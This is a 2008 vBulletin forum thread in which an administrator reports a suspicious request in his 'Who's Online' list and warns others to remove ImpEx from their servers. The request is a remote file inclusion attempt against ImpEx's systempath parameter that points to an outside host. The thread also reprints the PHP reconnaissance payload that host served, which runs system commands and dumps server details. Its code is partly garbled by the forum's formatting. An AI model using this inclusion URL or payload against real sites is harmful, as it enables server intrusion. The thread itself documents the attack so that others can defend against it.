Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #1  
Old 07-25-2008, 02:59 PM
Quarterbore Quarterbore is offline
 
Join Date: Mar 2005
Location: Valley Forge PA
Posts: 538
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Very Strange Location on WHO's Online

What do you make of this:

Quote:
Unknown Location
/index.php/impex/ImpExData.php?systempath=http://www.symbols-larp.com/inschrijven/symbols7/log/logfile.txt??
IP: 213.168.176.11 (details joe.mlboleslav.cz)

I checked and I don't have IMPEX on my server but it sure looks fishy to me!

I expect it may well be a random spam bot but I am not that famaliar with the Impex install code so I figured I would report this in case it may be a potential issue.

I will have to trace the code later.

The file that was linked to is this:

PHP Code:
<?php
function ConvertBytes($number)
{
        
$len strlen($number);
        if(
$len 4)
        {
                return 
sprintf("%d b"$number);
        }
        if(
$len >= && $len <=6)
        {
                return 
sprintf("%0.2f Kb"$number/1024);
        }
        if(
$len >= && $len <=9)
        {
                return 
sprintf("%0.2f Mb"$number/1024/1024);
        }
   
        return 
sprintf("%0.2f Gb"$number/1024/1024/1024);
                           
}

echo 
"netcat<br>";
$un = @php_uname();
$up system(uptime);
$id1 system(id);
$pwd1 = @getcwd();
$sof1 getenv("SERVER_SOFTWARE");
$php1 phpversion();
$name1 $_SERVER['SERVER_NAME'];
$ip1 gethostbyname($SERVER_ADDR);
$free1diskfreespace($pwd1);
$free ConvertBytes(diskfreespace($pwd1));
if (!
$free) {$free 0;}
$all1disk_total_space($pwd1);
$all ConvertBytes(disk_total_space($pwd1));
if (!
$all) {$all 0;}
$used ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo 
"netcat<br>";
echo 
"uname -a: $un<br>";
echo 
"os: $os<br>";
echo 
"uptime: $up<br>";
echo 
"id: $id1<br>";
echo 
"pwd: $pwd1<br>";
echo 
"php: $php1<br>";
echo 
"software: $sof1<br>";
echo 
"server-name: $name1<br>";
echo 
"server-ip: $ip1<br>";
echo 
"free: $free<br>";
echo 
"used: $used<br>";
echo 
"total: $all<br>";
exit;
--------------- Added [DATE]1217002175[/DATE] at [TIME]1217002175[/TIME] ---------------

OK, here is the explanation:

http://www.vbulletin.com/forum/showthread.php?t=271270

Make sure you don't leave Impex on your servers!
Reply With Quote
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 06:12 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03526 seconds
  • Memory Usage 2,306KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)bbcode_php
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (2)post_thanks_box
  • (2)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (2)post_thanks_postbit_info
  • (2)postbit
  • (2)postbit_onlinestatus
  • (2)postbit_wrapper
  • (1)showthread_list
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_threadedmode.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids_threaded
  • showthread_threaded_construct_link
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete